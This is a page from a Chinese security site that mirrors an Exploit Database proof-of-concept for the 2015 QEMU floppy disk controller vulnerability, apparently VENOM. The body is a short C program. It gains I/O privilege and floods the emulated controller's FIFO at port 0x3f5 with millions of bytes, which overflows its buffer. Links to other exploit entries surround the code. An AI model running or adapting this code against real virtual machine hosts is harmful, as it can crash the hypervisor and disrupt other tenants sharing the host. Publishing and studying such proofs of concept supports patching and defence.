体验盒子
  • 博文
  • 设计开发
  • 网络安全
  • 观点
  • 服务
  • AI导航
  • 更多
    • 关于
    • 分享
    • 老电影
    • 搜索语法
    • SecTools
    • UserAgent解析
    • 地理坐标在线转换

QEMU – Floppy Disk Controller (FDC) (PoC)

  • Exploit Database
  • 97 阅读
  • 作者: Marcus Meissner
    日期: 2015-05-18
  • 类别:
    • dos
    平台:
    • multiple
  • 来源:https://www.exploit-db.com/exploits/37053/
  • 1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    // Source: https://marc.info/?l=oss-security&m=143155206320935&w=2
     
    #include <sys/io.h>
     
    #define FIFO 0x3f5
     
    int main() {
    int i;
    iopl(3);
     
    outb(0x0a,0x3f5); /* READ ID */
    for (i=0;i<10000000;i++)
    outb(0x42,0x3f5); /* push */
    }
     
上一篇: Burning Board < 2.3.1 - SQL Injection
下一篇: Microsoft Windows 8.0/8.1 (x64) – ‘TrackPopupMenu’ Local Privilege Escalation (MS14-058)
  • last Exploits
  • QEMU – Floppy Disk Controller (FDC) (PoC)的更多信息
  • Peercast < 0.1211 - Format String:
  • sudo 1.8.0 < 1.8.3p1 - Format String:
  • Gold MP4 Player 3.3 – Buffer Overflow (PoC) (SEH):
  • pdfium – CPDF_Function::Call Stack Buffer Overflow:
  • Hacker Evolution Game: untold Mod Editor 2.00.001 – Buffer Overflow (PoC):
  • DVD-Lab Studio 1.25 – ‘.DAL’ File Open Crash:
  • IBM DB2 9.7/10.1/10.5/11.1 – Command Line Processor Buffer Overflow:
  • Oracle Java Runtime Environment – Heap Corruption During TTF font Rendering in sc_FindExtrema4:
体验盒子
  • 关于
  • 博文
  • 分享
  • 存档
  • 服务
体验盒子所发布的一切资源仅限用于学习和研究目的。不得用于非法用途,否则,一切后果用户自负。

2024 体验盒子, 滇ICP备15006848号-1

扫码分享

网络安全
验证:体验盒子
扫码分享
网络安全
打赏零钱
  • 支付宝打赏
  • 微信打赏